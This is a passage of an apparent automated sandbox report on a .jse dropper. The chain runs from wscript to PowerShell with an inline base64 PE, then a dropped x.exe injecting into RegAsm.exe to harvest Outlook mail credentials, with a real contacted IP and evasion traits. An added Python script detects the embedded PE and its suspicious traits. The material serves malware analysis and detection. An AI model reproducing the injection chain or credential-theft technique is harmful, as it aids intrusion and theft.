                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exe :: Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c262-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 (the JScript.Encode script engine, which is what a .jse file runs under)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe :: Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (the Outlook 2013 profile store holding mail account settings; reading it is the mail-credential harvesting flagged by the "Tries to steal Mail credentials" signature)

                Data Obfuscation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Anti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEFAL (the argument decodes to an MZ/PE header: the script carries the next-stage executable inline)
Source: x.exe.1.dr :: Static PE information: compile timestamp (TimeDateStamp) 0xA177E0B7 [Fri Nov 5 00:41:27 2055 UTC], a date in the future
Source: x.exe.1.dr :: Static PE information: section name: 6Fd:c#
Source: x.exe.1.dr :: Static PE information: section name: (empty)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Code function: 1_2_00007FFD9B7E1B65 push eax; iretd 1_2_00007FFD9B7E1B5D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Code function: 1_2_00007FFD9B7E1B22 push eax; iretd 1_2_00007FFD9B7E1B5D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Code function: 1_2_00007FFD9B7E00AD pushad ; iretd 1_2_00007FFD9B7E00C1
Source: x.exe.1.dr :: Static PE information: section name: 6Fd:c# entropy: 7.99799588046591 (close to the 8.0 maximum, consistent with packed or encrypted content)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: File created: C:\Users\user\AppData\Local\Temp\x.exe
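The AMSI capture above (a FromBase64String argument that starts with the MZ header) and the static flags on the dropped x.exe (compile timestamp in 2055, a section named 6Fd:c#, a nameless section, a section at entropy 7.998) are indicators a triage script can check automatically. The Python below is an added example written for this page; it is not Joe Sandbox code and not part of the sample. It decodes the truncated base64 fragment from the AMSI line and confirms it is a PE prefix, then runs the same timestamp, section-name and entropy checks over a PE32 image constructed inline to reproduce those traits (that image is not x.exe; the 7.5 bits-per-byte entropy threshold and the "normal section name" pattern are assumptions).

```python
import base64
import math
import re
import struct
import time
from collections import Counter
from datetime import datetime, timezone

# Base64 argument captured by AMSI in the report above; the report cuts it off, so the
# trailing partial group ("AL") is dropped before decoding. The 47-byte zero run of the
# DOS header is written as "A" * 47 to keep it readable.
AMSI_B64 = ("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQ" + "A" * 47 +
            "gAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0K"
            "JAAAAAAAAABQRQAATAEFAL")
FROM_B64 = re.compile(r'FromBase64String\(\s*"([A-Za-z0-9+/=]+)', re.IGNORECASE)
SECTION_NAME_OK = re.compile(rb"^[A-Za-z0-9_.$]+$")   # assumed: what linkers normally emit

def decode_lenient(b64):
    """Decode base64 that may have been cut off mid-group, as in a log excerpt."""
    b64 = b64.rstrip("=")
    return base64.b64decode(b64[: len(b64) - len(b64) % 4])

def pe_prefix(data):
    """(e_lfanew, machine) if data starts with a DOS/PE header, else None; machine is None
    when the blob ends before the COFF header."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine = struct.unpack_from("<H", data, e_lfanew + 4)[0] if len(data) >= e_lfanew + 6 else None
    return e_lfanew, machine

def find_embedded_pe(script_text):
    """Scan PowerShell / AMSI text for FromBase64String("...") arguments that decode to a PE."""
    hits = []
    for m in FROM_B64.finditer(script_text):
        blob = decode_lenient(m.group(1))
        info = pe_prefix(blob)
        if info:
            hits.append({"e_lfanew": info[0], "machine": info[1], "decoded_len": len(blob)})
    return hits

def entropy(buf):
    """Shannon entropy in bits per byte; values near 8.0 mean packed or encrypted data."""
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values()) if n else 0.0

def triage_pe(data, now=None):
    """Static checks matching the report's flags: timestamp in the future, nameless or
    oddly named sections, section entropy close to 8.0 (the 7.5 threshold is an assumption)."""
    info = pe_prefix(data)
    if info is None:
        raise ValueError("not a PE image")
    e_lfanew = info[0]
    _machine, nsec, ts, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    findings = []
    if ts > (time.time() if now is None else now):
        when = datetime.fromtimestamp(ts, timezone.utc).strftime("%Y-%m-%d %H:%M:%S")
        findings.append(("timestamp_future", f"0x{ts:08X} ({when} UTC)"))
    table = e_lfanew + 24 + opt_size                 # section table follows the optional header
    for i in range(nsec):
        name, _vs, _va, rawsize, rawptr, *_ = struct.unpack_from("<8sIIIIIIHHI", data, table + 40 * i)
        name = name.rstrip(b"\0")
        label = name.decode("latin-1") or "<empty>"
        if not name:
            findings.append(("nameless_section", f"section {i}"))
        elif not SECTION_NAME_OK.match(name):
            findings.append(("special_char_section_name", label))
        ent = entropy(data[rawptr:rawptr + rawsize])
        if ent > 7.5:
            findings.append(("high_entropy_section", f"{label}: {ent:.3f}"))
    return findings

def build_sample_pe():
    """Constructed PE32 image reproducing the traits reported for x.exe (this is NOT x.exe):
    TimeDateStamp 0xA177E0B7, a section named '6Fd:c#', a nameless section, one section
    of uniformly distributed bytes (entropy exactly 8.0)."""
    sections = [
        (b".text", bytes(0x200)),              # all zeros: entropy 0
        (b"6Fd:c#", bytes(range(256)) * 2),    # every byte value twice: entropy 8.0
        (b"", bytes(0x100)),                   # nameless section
    ]
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)    # e_lfanew
    opt = b"\x0b\x01" + bytes(222)             # PE32 magic; the rest is unused by these checks
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0xA177E0B7, 0, 0, len(opt), 0x102)
    raw = (0x80 + 4 + len(coff) + len(opt) + 40 * len(sections) + 0x1FF) & ~0x1FF  # 512-aligned
    table, body = b"", b""
    for i, (name, content) in enumerate(sections):
        table += struct.pack("<8sIIIIIIHHI", name, len(content), 0x1000 * (i + 1),
                             len(content), raw + len(body), 0, 0, 0, 0, 0x60000020)
        body += content
    img = bytes(dos) + b"PE\0\0" + coff + opt + table
    return img + bytes(raw - len(img)) + body
```

Run `find_embedded_pe` over PowerShell script-block log text (event 4104) or AMSI buffers and `triage_pe` over any dropped file; on the fragment from this report the first returns e_lfanew 0x80 and Machine 0x014C (i386), and on the constructed image the second reports all four traits. The lenient decoder matters in practice because log excerpts, like the AMSI line here, are frequently truncated mid-group.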
Source: C:\Windows\System32\wscript.exe :: Process information set: NOOPENFILEERRORBOX (SetErrorMode; 3 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Process information set: NOOPENFILEERRORBOX (SetErrorMode; 74 occurrences)
Source: C:\Users\user\AppData\Local\Temp\x.exe :: Process information set: NOOPENFILEERRORBOX (SetErrorMode; 19 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe :: Process information set: NOOPENFILEERRORBOX (SetErrorMode; 56 occurrences)
Source: C:\Users\user\AppData\Local\Temp\x.exe :: Memory allocated: E50000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\x.exe :: Memory allocated: 2C90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\x.exe :: Memory allocated: 29F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\x.exe :: Memory allocated: 51D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\x.exe :: Memory allocated: 61D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\x.exe :: Memory allocated: 6300000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\x.exe :: Memory allocated: 7300000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe :: Memory allocated: 2A60000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe :: Memory allocated: 2CC0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe :: Memory allocated: 2BC0000 memory reserve | memory write watch
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\x.exe :: Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe :: Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe :: Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Window / User API: threadDelayed 3056
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Window / User API: threadDelayed 3143
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe :: Window / User API: threadDelayed 2266
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe :: Window / User API: threadDelayed 7593
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7652 :: Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7624 :: Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7680 :: Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872 :: Thread sleep count: 35 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872 :: Thread sleep time: -32281802128991695s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872 :: Thread sleep time: -100000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7876 :: Thread sleep count: 2266 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872 :: Thread sleep time: -99890s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7876 :: Thread sleep count: 7593 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872 :: Thread sleep time: -99781s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872 :: Thread sleep time: -99672s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872 :: Thread sleep time: -99562s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872 :: Thread sleep time: -99453s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872 :: Thread sleep time: -99343s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872 :: Thread sleep time: -99234s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872 :: Thread sleep time: -99125s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872 :: Thread sleep time: -99015s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872 :: Thread sleep time: -98906s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872 :: Thread sleep time: -98797s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872 :: Thread sleep time: -98687s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872 :: Thread sleep time: -98578s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872 :: Thread sleep time: -98468s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872 :: Thread sleep time: -98359s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872 :: Thread sleep time: -98250s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872 :: Thread sleep time: -98140s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872 :: Thread sleep time: -98031s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872 :: Thread sleep time: -97922s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872 :: Thread sleep time: -97812s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872 :: Thread sleep time: -97703s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872 :: Thread sleep time: -97593s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872 :: Thread sleep time: -97484s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872 :: Thread sleep time: -97344s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872 :: Thread sleep time: -97234s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872 :: Thread sleep time: -97122s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872 :: Thread sleep time: -97015s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872 :: Thread sleep time: -96906s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872 :: Thread sleep time: -96797s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872 :: Thread sleep time: -96687s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872 :: Thread sleep time: -96578s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -96469s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -96359s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -96250s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -96140s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -96030s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -95921s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -95812s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -95703s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -95593s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -95484s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -95375s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -95265s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -95156s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -95047s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -94937s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -94828s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -94696s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7872Thread sleep time: -94593s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 100000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99343Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99125Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 99015Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98906Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98797Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98468Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98359Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98250Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98140Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 98031Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 97922Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 97812Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 97703Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 97593Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 97484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 97344Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 97234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 97122Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 97015Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 96906Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 96797Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 96687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 96578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 96469Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 96359Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 96250Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 96140Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 96030Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 95921Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 95812Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 95703Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 95593Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 95484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 95375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 95265Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 95156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 95047Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 94937Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 94828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 94696Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 94593Jump to behavior
                Source: powershell.exe, 00000001.00000002.1829673756.000001DCBF714000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: powershell.exe, 00000001.00000002.1829673756.000001DCBF714000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSIdRom&Ven_NECVMWar&Prod_VMware_
                Source: RegAsm.exe, 00000005.00000002.2955331627.0000000000F31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQ
                Source: powershell.exe, 00000001.00000002.1829673756.000001DCBF714000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}
                Source: wscript.exe, 00000000.00000003.1834258490.000001E210E2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1839683434.000001E213407000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1836905195.000001E213407000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1838665257.000001E210E31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: wscript.exe, 00000000.00000002.1839863288.000001E213474000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02AAC168 LdrInitializeThunk,LdrInitializeThunk,5_2_02AAC168
                Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe | Network Connect: 108.181.20.35 443
Source: C:\Users\user\AppData\Local\Temp\x.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\x.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\x.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\x.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41A000
Source: C:\Users\user\AppData\Local\Temp\x.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41C000
Source: C:\Users\user\AppData\Local\Temp\x.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\x.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: AB8008
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
